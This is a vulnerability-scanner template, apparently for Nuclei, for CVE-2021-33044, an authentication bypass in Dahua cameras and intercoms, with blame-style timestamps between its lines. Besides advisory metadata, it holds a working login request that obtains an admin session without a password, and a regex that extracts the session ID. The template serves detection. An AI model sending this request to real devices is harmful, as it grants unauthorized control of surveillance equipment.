2021-10-19 03:44:56 +00:00
id : CVE-2021-33044
info :
2022-06-03 19:12:31 +00:00
name : Dahua IPC/VTH/VTO - Authentication Bypass
2021-10-19 03:44:56 +00:00
author : gy741
severity : critical
2022-06-03 19:12:31 +00:00
description : Some Dahua products contain an authentication bypass during the login process. Attackers can bypass device identity authentication by constructing malicious data packets.
2023-09-27 15:51:13 +00:00
impact : |
An attacker can gain unauthorized access to the device, potentially compromising the security and privacy of the system.
2023-09-06 12:09:01 +00:00
remediation : |
Apply the latest firmware update provided by Dahua to fix the authentication bypass vulnerability.
2021-10-19 03:44:56 +00:00
reference :
- https://github.com/dorkerdevil/CVE-2021-33044
2021-10-19 12:14:06 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2021-33044
2021-10-19 03:44:56 +00:00
- https://seclists.org/fulldisclosure/2021/Oct/13
2022-05-17 09:18:12 +00:00
- https://www.dahuasecurity.com/support/cybersecurity/details/957
2021-10-19 03:44:56 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
2022-04-22 10:38:41 +00:00
cvss-score : 9.8
2021-10-19 03:44:56 +00:00
cve-id : CVE-2021-33044
cwe-id : CWE-287
2023-12-12 11:07:52 +00:00
epss-score : 0.29051
2024-01-14 13:49:27 +00:00
epss-percentile : 0.96446
2023-09-06 12:09:01 +00:00
cpe : cpe:2.3:o:dahuasecurity:ipc-hum7xxx_firmware:*:*:*:*:*:*:*:*
2023-04-28 08:11:21 +00:00
metadata :
max-request : 1
2023-07-11 19:49:27 +00:00
vendor : dahuasecurity
product : ipc-hum7xxx_firmware
2024-01-14 09:21:50 +00:00
tags : cve2021,cve,dahua,auth-bypass,seclists,dahuasecurity
2021-10-19 03:44:56 +00:00
2023-04-27 04:28:59 +00:00
http :
2021-10-19 03:44:56 +00:00
- raw :
- |
POST /RPC2_Login HTTP/1.1
Host : {{Hostname}}
Accept : application/json, text/javascript, */*; q=0.01
Connection : close
X-Requested-With : XMLHttpRequest
Content-Type : application/x-www-form-urlencoded; charset=UTF-8
2021-11-08 10:15:54 +00:00
Origin : {{BaseURL}}
Referer : {{BaseURL}}
2021-10-19 03:44:56 +00:00
{"id": 1, "method": "global.login", "params": {"authorityType": "Default", "clientType": "NetKeyboard", "loginType": "Direct", "password": "Not Used", "passwordType": "Default", "userName": "admin"}, "session": 0 }
matchers-condition : and
matchers :
- type : word
part : body
words :
2021-11-08 10:15:54 +00:00
- '"result":true'
- 'id'
- 'params'
- 'session'
2021-10-19 03:44:56 +00:00
condition : and
2021-10-19 12:14:06 +00:00
2023-07-11 19:49:27 +00:00
- type : status
status :
- 200
2021-10-19 12:14:06 +00:00
extractors :
- type : regex
group : 1
regex :
- ',"result":true,"session":"([a-z]+)"\}'
2023-07-11 19:49:27 +00:00
part : body
2024-01-26 08:31:11 +00:00
# digest: 4a0a00473045022100969dc816553940d4ba45200da238d7df4503480847dc4729f24dbeea283d51b302203e3bc11853da98fc6f17ca80f318604a3a94eb5fd28376a5c321efee7f7d1358:922c64590222798bb761d5b6d8e72950